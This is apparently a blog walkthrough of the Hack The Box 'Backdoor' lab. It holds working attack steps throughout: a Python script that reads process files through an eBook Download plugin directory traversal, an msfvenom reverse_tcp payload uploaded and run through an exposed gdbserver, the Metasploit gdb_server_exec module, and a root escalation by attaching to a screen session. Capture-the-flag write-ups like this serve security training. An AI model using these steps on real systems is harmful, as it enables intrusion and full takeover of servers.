In this post, I would like to share a walkthrough of the Backdoor machine from Hack The Box.


This machine is rated Easy on Hack The Box.

What will you gain from Backdoor machine?


For the user flag, you will exploit a directory traversal in the WordPress eBook Download plugin and then a gdbserver instance. For the gdbserver part, I show two ways to get a user shell: exploiting it manually with gdb, and using Metasploit.


As for the root flag, you attach to a screen session that is running as root to get a root shell.

Information Gathering on Backdoor Machine


Once the VPN connection is up (the configuration file is downloaded from Hack The Box), we can start information gathering on the machine by running nmap -sC -sV -p- -Pn <IP Address>


From the Nmap output, we only find ports 22 (SSH) and 80 (HTTP), and the web server leads to http://backdoor.htb (the hostname needs an /etc/hosts entry pointing at the target IP).


Let's browse the website to look for anything we can exploit.


Sadly, we don't find anything we can use directly, but I notice that the site is powered by WordPress.


Let's run wpscan, which enumerates the WordPress installation and reports known vulnerabilities.


It takes some time to retrieve the results.


Meanwhile, we can manually check the WordPress directories.


From my experience with WordPress, there is usually something interesting under /wp-content/plugins.


Browsing that directory, we notice an ebook-download plugin directory that may be useful later.


Accessing the plugin's filedownload.php file directly returns a blank page.


Let's look up known exploits for the ebook-download plugin on the internet.

Source: WordPress Plugin eBook Download 1.1 – Directory Traversal – PHP webapps Exploit (exploit-db.com)

From the result, we find that version 1.1 of the eBook Download plugin is vulnerable to directory traversal: filedownload.php does not sanitise the path it is given, so it can be made to read arbitrary files from the server (treated here as Local File Inclusion, LFI).


We can test the traversal with Burp Suite, but we can also use wfuzz to brute-force which paths are readable through it.


Moving forward a bit: by fuzzing paths this way, we eventually retrieve a file whose contents show gdbserver listening on port 1337.
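The fuzzing step above, as an added example in Python that is not part of the original write-up: it builds the traversal requests for /proc/<pid>/cmdline, strips the plugin's echo of the requested path from each response, and reports any process whose arguments contain a listen address. The endpoint and parameter are taken from the cited exploit-db entry; the echo-stripping behaviour, the readability of /proc through the web server and BASE_URL are assumptions, and the responses it uses when run offline are constructed.

```python
"""Find the service behind port 1337 by reading /proc through the eBook
Download directory traversal.

Added example, not the original write-up's commands and not the plugin's
code. Assumptions: the endpoint and parameter come from the cited
exploit-db entry (filedownload.php?ebookdownloadurl=...); the plugin
echoes the requested path before the file body and appends a
window.close() script; /proc/<pid>/cmdline is readable by the web server
user. BASE_URL and DEPTH are placeholders for your own lab.
"""
import re
import urllib.request
from typing import Callable, Iterable, Iterator, List, Optional, Tuple

BASE_URL = "http://backdoor.htb"  # assumed target
ENDPOINT = "/wp-content/plugins/ebook-download/filedownload.php"
PARAM = "ebookdownloadurl"
DEPTH = 3  # ../ segments needed to climb out of the plugin directory
TAIL = b"<script>window.close()</script>"

Fetcher = Callable[[str], bytes]


def traversal(path: str, depth: int = DEPTH) -> str:
    """Parameter value that reaches an absolute path via ../ segments."""
    return "../" * depth + path.lstrip("/")


def traversal_url(path: str, depth: int = DEPTH) -> str:
    return f"{BASE_URL}{ENDPOINT}?{PARAM}={traversal(path, depth)}"


def strip_echo(body: bytes, path: str, depth: int = DEPTH) -> bytes:
    """Drop the plugin's echo of the requested path and the trailing script,
    leaving only the raw file contents (empty if the file was unreadable)."""
    marker = traversal(path, depth).encode()
    while body.startswith(marker):
        body = body[len(marker):]
    if body.endswith(TAIL):
        body = body[: -len(TAIL)]
    return body


def parse_cmdline(raw: bytes) -> List[str]:
    """/proc/<pid>/cmdline separates arguments with NUL bytes."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00") if arg]


# host:port or :port, as gdbserver and most daemons spell a listen address
LISTEN_RE = re.compile(r"^(?:\d{1,3}(?:\.\d{1,3}){3}|\*)?:(\d{1,5})$")


def listening_port(argv: List[str]) -> Optional[int]:
    for arg in argv:
        match = LISTEN_RE.match(arg)
        if match:
            return int(match.group(1))
    return None


def http_fetch(url: str, timeout: float = 5.0) -> bytes:
    """Real fetcher for use against a live target."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def find_listeners(fetch: Fetcher, pids: Iterable[int],
                   depth: int = DEPTH) -> Iterator[Tuple[int, List[str], int]]:
    """Read each /proc/<pid>/cmdline through the traversal and yield
    (pid, argv, port) for processes whose arguments name a listen address.
    Empty results (no such pid, kernel thread, unreadable) are skipped."""
    for pid in pids:
        path = f"/proc/{pid}/cmdline"
        try:
            body = fetch(traversal_url(path, depth))
        except OSError:
            continue
        argv = parse_cmdline(strip_echo(body, path, depth))
        port = listening_port(argv) if argv else None
        if port is not None:
            yield pid, argv, port


# Constructed offline stand-in for the target: three readable cmdlines, one
# of them shaped like the gdbserver process the walkthrough finds.
FAKE_CMDLINES = {
    1: b"/sbin/init\x00",
    842: b"/usr/sbin/apache2\x00-k\x00start\x00",
    858: b"gdbserver\x00--once\x000.0.0.0:1337\x00/bin/true\x00",
}


def fake_fetch(url: str) -> bytes:
    value = url.split("=", 1)[1]
    pid = int(value.rsplit("/", 2)[-2])  # .../proc/<pid>/cmdline
    return value.encode() * 3 + FAKE_CMDLINES.get(pid, b"") + TAIL


if __name__ == "__main__":
    for pid, argv, port in find_listeners(fake_fetch, range(1, 1000)):
        print(f"pid {pid} listens on port {port}: {' '.join(argv)}")
```

Against a live target, pass http_fetch instead of fake_fetch. The wfuzz approach in the write-up achieves the same thing by hiding responses whose size equals the bare echo, so only pids with readable, non-empty command lines remain.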

Step 1: Manual exploitation with msfvenom and gdb


First, we need to create the malicious payload with msfvenom, for example msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<any port> -f elf -o <filename>.elf


Let's start gdb on our attacking machine.


Let's connect to the target on port 1337 by running the command target extended-remote 10.10.11.125:1337


Sadly, the first attempt times out; running the same command a second time succeeds.


Finally, we upload the payload (remote put writes it relative to gdbserver's working directory on the target, /home/user here) and point gdb at it with the following commands:

remote put <filename>.elf <filename>.elf
set remote exec-file /home/user/<filename>.elf
show remote exec-file

Start a netcat listener on your attacking machine on the LPORT you chose.


To get the reverse shell connection back to us, we run the following in gdb:

b main
run

Voila! We get the reverse shell connection back, but since linux/x64/meterpreter/reverse_tcp is a staged payload that expects a Metasploit handler, a plain netcat listener does not give us a proper shell.

Step 2: Metasploit


I will skip the basic Metasploit setup and focus on running the exploit.


For this, we use the multi/gdb/gdb_server_exec module in Metasploit.


The screenshot above shows the module options we need to set: the target host and port (1337) and our listener host and port.


I almost forgot the payload: we need to run set payload linux/x64/meterpreter/reverse_tcp before running the exploit with run


At last, we get a Meterpreter session with the configuration shown above.


Typing shell opens channel 1, which is Metasploit's way of dropping into a system shell.


We run python3 -c 'import pty;pty.spawn("/bin/bash")' to obtain an interactive shell.


As usual, we can read the user flag by running the “cat user.txt” command

Escalate to Root Privileges Access


We run ps aux to see the processes running on the victim's machine.


Uwu! We notice that screen is running on the machine as root, started as SCREEN -dmS root (a detached session named root).


For those not familiar with screen: it is a terminal multiplexer. You start a session with screen, can open any number of virtual terminals within it, and a detached session can be re-attached later by anyone allowed to access it.

Source: screen | GTFOBins

GTFOBins lists a few screen commands we can take advantage of here.


When we run screen -x root, we get the error "Must be connected to a terminal".


The error occurs because we do not have a full TTY yet. To get one, run the following before trying again:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

Running screen -x root again now attaches us to the root session, and we have a root shell.


As usual, we can read the root flag by running the “cat root.txt” command


-THE END-


Happy Learning Guys!

Extra Information


The root password hash in /etc/shadow can be used to unlock and read the official write-up on Hack The Box.